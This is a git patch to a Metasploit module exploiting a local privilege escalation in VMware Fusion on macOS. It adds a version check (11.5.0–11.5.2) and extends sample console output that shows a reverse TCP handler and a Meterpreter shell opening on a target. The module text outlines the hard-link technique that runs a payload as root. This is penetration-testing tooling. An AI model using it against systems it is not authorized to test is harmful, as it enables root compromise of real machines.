From 7bc30ecf397c3cbb922e277dbd4e84fafe2d3cc7 Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Tue, 24 Mar 2020 14:27:31 -0400
Subject: [PATCH] add version check

---
 .../exploit/osx/local/vmware_fusion_lpe.md    |  2 ++
 .../exploits/osx/local/vmware_fusion_lpe.rb   | 19 +++++++++++++++----
 2 files changed, 17 insertions(+), 4 deletions(-)

diff --git a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
index 3d41417e51..d5fb296a62 100644
--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -46,6 +46,8 @@ lhost => 1.1.1.1
 resource (fusion.rb)> set lport 8888
 lport => 8888
 resource (fusion.rb)> exploit
+[+] Vmware Fusion 11.5.1 is exploitable
+[*] The target appears to be vulnerable.
 [*] Started reverse TCP handler on 1.1.1.1:8888 
 [*] Sending stage (53755 bytes) to 2.2.2.2
 [*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49265) at 2020-03-23 18:07:57 -0400
diff --git a/modules/exploits/osx/local/vmware_fusion_lpe.rb b/modules/exploits/osx/local/vmware_fusion_lpe.rb
index af7f69fa21..77b554b1ad 100644
--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Local
             user home directory in a specific folder, and creating a hard link to the 'Open VMWare
             USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
             with an effective UID of 0.
+            Successfully tested against 11.5.1, and 11.5.2
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -69,11 +70,21 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
-      print_good "'#{usb_service}' binary detected"
-      return CheckCode::Appears
+    unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
+      print_bad "'#{usb_service}' binary missing"
+      return CheckCode::Safe
     end
-    CheckCode::Safe
+    
+    version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
+    /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
+    version = Gem::Version.new(version)
+    if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
+      vprint_good "Vmware Fusion #{version} is exploitable"
+    else    
+      print_bad "VMware Fusion #{version} is NOT exploitable"
+      return CheckCode::Safe
+    end
+    CheckCode::Appears
   end
 
   def exploit